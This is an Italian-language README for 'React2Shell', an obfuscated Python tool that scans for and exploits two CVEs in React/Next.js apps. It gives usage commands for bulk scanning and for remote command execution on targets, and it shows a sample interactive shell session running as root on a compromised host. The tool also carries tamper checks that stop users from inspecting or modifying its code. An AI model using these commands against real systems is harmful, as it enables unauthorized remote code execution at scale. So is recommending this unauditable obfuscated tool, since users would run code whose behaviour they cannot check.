
React2Shell - CVE-2025-55182 & CVE-2025-66478
Autore: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Versione: 2.0.0 (Offuscata)
Data: 2025-12-07
python react2shell.py
Tutto qui! Lo scanner:
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
Ogni volta che esegui lo scanner, automaticamente:
Se qualcuno tenta di modificare il codice offuscato:
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Lo scanner rifiuterà di eseguire se rileva qualsiasi manomissione.
Tutte le funzionalità originali sono 100% preservate:
python react2shell.py -u https://example.com
Output:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
Sessione Shell:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
Questo strumento è SOLO PER TEST DI SICUREZZA AUTORIZZATI!
✅ Le tue applicazioni
✅ Test di penetrazione autorizzati
✅ Programmi Bug Bounty (in scope)
✅ Ricerca sulla sicurezza (autorizzata)
❌ Scansione non autorizzata
❌ Exploit non autorizzato
❌ Qualsiasi attività illegale
❌ Violazione dei termini di servizio
L'autore (LAKSHMIKANTHAN K) non è responsabile dell'uso improprio di questo strumento. Gli utenti sono gli unici responsabili delle proprie azioni e devono rispettare tutte le leggi applicabili.
Causa: Il file è corrotto
Soluzione: Scarica una copia nuova
Causa: Il file è stato modificato
Soluzione: Scarica una copia nuova (non modificare il file)
Causa: Dipendenze mancanti
Soluzione:
pip install requests urllib3
Causa: Overhead di decompressione (minimo)
Nota: Avviene solo una volta all'avvio, poi gira a piena velocità
R: Il codice è offuscato e compresso. Puoi usare la versione originale non offuscata se hai bisogno di leggere il codice.
R: Impatto minimo. C'è un piccolo ritardo all'avvio per la decompressione (~0,1 secondi), poi gira a piena velocità.
R: No. Qualsiasi modifica romperà la verifica dell'integrità e lo scanner rifiuterà di eseguire.
R: L'offuscamento non è crittografia. Attaccanti determinati possono comunque fare reverse engineering, ma è molto difficile e richiede tempo.
R: Contatta l'autore su Instagram: @letchu_pkt
Nome: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Se riscontri problemi:
pip install requests urllib3
python react2shell.py
Scegli dal menu interattivo o usa la modalità CLI.
Segui le istruzioni o fornisci gli argomenti da riga di comando.
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Grazie per aver usato il CVE Scanner! 🚀
Versione: 2.0.0 (Offuscata)
Data: 2025-12-07
Licenza: Solo per test di sicurezza autorizzati